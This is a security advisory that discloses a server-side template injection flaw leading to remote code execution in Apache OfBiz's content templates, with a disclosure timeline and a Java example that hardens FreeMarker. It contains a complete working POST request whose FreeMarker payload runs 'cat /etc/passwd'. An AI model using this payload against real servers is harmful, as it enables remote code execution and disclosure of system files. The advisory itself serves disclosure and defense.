January 26, 2021

GHSL-2020-070: Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE) in Apache OfBiz

Alvaro Muñoz

Coordinated Disclosure Timeline

  • 04/13/2020: Report sent to vendor.
  • 04/23/2020: OfBiz maintainer acknowledges the issue.
  • 04/23/2020: As per Apache policy, no CVE will be issued for post-authentication vulnerabilities, regardless of whether they are privilege escalations or XSS issues (including this one, which can be triggered via the XSS reported in GHSL-2020-068).
  • 01/10/2021: Addressed in 17.12.05


Summary

Apache OfBiz is vulnerable to Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE).


Product

Apache OfBiz

Tested Version



Server-Side Template Injection through Content templates

A user with privileges to edit Content Manager templates can use the UI or a direct POST request to have an attacker-controlled FreeMarker template evaluated on the server. The request below runs the cat /etc/passwd command and returns its contents in the response:

POST /content/control/createLayoutSubContent HTTP/1.1
Host: demo-stable.ofbiz.apache.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Connection: close
Cookie: JSESSIONID=9697AC85B262C213DEA0A548939118F6.jvm1;

contentTypeId=DOCUMENT&contentIdTo=TEMPLATE_MASTER&drDataResourceTypeId=ELECTRONIC_TEXT&drDataTemplateTypeId=FTL&textData=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
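The payload works because FreeMarker's ?new built-in instantiates an arbitrary class by name, and freemarker.template.utility.Execute runs shell commands. The following is an added example, not OFBiz code and not the 17.12.05 fix: it shows a FreeMarker Configuration hardened with a class resolver that refuses ?new, so a template of the shape above is rejected while ordinary content templates still render (assumes the freemarker library on the classpath; the "true" command is a constructed harmless stand-in).

```java
import freemarker.cache.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Collections;
import java.util.Map;

// Added example (not OFBiz code): a FreeMarker Configuration in which the ?new
// built-in, which the advisory's payload relies on, cannot instantiate classes.
public class SafeFreemarkerConfig {

    static Configuration hardenedConfiguration() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_28);
        // Refuse every ?new(...) call. If legitimate templates genuinely need ?new,
        // TemplateClassResolver.SAFER_RESOLVER (blocks Execute, ObjectConstructor and
        // JythonRuntime) or a custom allow-list resolver is the narrower alternative.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    // Renders user-supplied template text against a data model.
    static String render(Configuration cfg, String source, Map<String, Object> model)
            throws IOException, TemplateException {
        Template t = new Template("userTemplate", new StringReader(source), cfg);
        StringWriter out = new StringWriter();
        t.process(model, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        Configuration cfg = hardenedConfiguration();
        Map<String, Object> model = Collections.singletonMap("title", "Welcome");

        // A benign content template still renders normally.
        System.out.println(render(cfg, "<h1>${title}</h1>", model));

        // Same shape as the injected template in the advisory, with a harmless
        // constructed command. The resolver refuses it before any class is created.
        String injected = "${\"freemarker.template.utility.Execute\"?new()(\"true\")}";
        try {
            render(cfg, injected, model);
            System.out.println("UNEXPECTED: template was evaluated");
        } catch (TemplateException e) {
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```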


Impact

This issue leads to Remote Code Execution.


CVE

Not assigned


Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).


Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-070 in any communication regarding this issue.